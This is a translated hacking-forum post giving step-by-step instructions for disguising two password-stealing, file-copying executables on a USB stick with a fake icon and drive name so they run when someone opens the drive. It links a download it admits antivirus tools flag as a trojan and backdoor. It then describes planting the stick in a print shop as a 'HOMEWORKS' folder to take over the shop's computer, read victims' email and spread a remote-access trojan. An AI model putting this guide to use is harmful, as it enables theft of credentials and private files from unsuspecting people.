Webrowser.exe
and usb accelerator.exe that I quoted from a site called korkusuz yazar
Don't worry, ALL IN DOWNLOAD LINK
Not advertising

The download link that I will explain step by step is below. No Rar Pass

Step 1: Download the file from the link below
2. Throw in desktop
3. say get out here
4. Then insert the flash memory and throw all of them except the program named usbac (create a new folder in flash and put it in )
5. Then double click on usbac and install
6. Then an application will be opened (the application you installed)
7. Select EverestMausesettings.exe from the applications you have thrown to the flash (with the Browse button)
8. After this first part, go down, click where it says browse and select usb, not folders.
9. Then choose any icon where it says icon at the bottom, let it be believable, I put it to you, the skype icon and this icon will also change your usb default icon.
10. Write whatever you want in the place below, but be careful, whatever you write will be the flash memory name. Press create the latest and you're done. After creating it, remove and insert the flash for testing and you will see it.

Note: The application names have been changed by me so that they should be convincing for you.
Important: The application that starts with Everest automatically copies everything in the computer's DOWNLOADS PICTURES, VIDEOS, D0CUMENTS folders.
Application that starts with Sony creates a file named log.txt. and saves all passwords in browsers to it.

LAST IMPORTANT WARNING: There are 2 exe applications here, after doing what I wrote above, do the same to the application starting with Sony from step 7, otherwise only one works. VIRUS CAN BE DETECTED BECAUSE THESE APPLICATIONS ARE PASSWORD STEAL (PASSWORD STEAL)
SOFTWARE, BUT ABSOLUTELY NO VIRUS.

download link:
Link 1 : İndir zip
VT :https://www.virustotal.com/gui/file/...2236/detection
VT has found 44 TROJEN BACKDOORBOT AND PASSWORD STEAL. After all we access the computer so it is normal to find it.

Note3: The reason we installed extra software here is that the autorun feature is disabled in windows, so you can do it in all windows series with this method.
The website to find the icon you want: https: //www.iconfinder.com

Scenario:

I use this method often.
When you do the steps above, create a folder in your memory and make its name HOMEWORKS. For example you go to the X. grade or you are studying the X section in the University. Find pictures about it on google. Math or physics etc. and download the relevant pictures with it and put them in the folder you just opened and go to the stationery and say you want to print. It doesn't matter who plugs the usb. Print it out and go.
Result:
Costs 25-50 up to 75 cents
Benefit: You own that computer. You can even make a profit by having it go to a shortened link every time the browser opened or even because you have access to their mails, you can do the same with RAT this time and you can infect anyone with a USB plug in RAT.

I do not accept responsibility.

source: https://www.turkhackteam.org/trojan...nu-usb-ile-otomatik-sifre-ve-dosya-calma.html
çevirmen/translator: Captainyarimca

Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.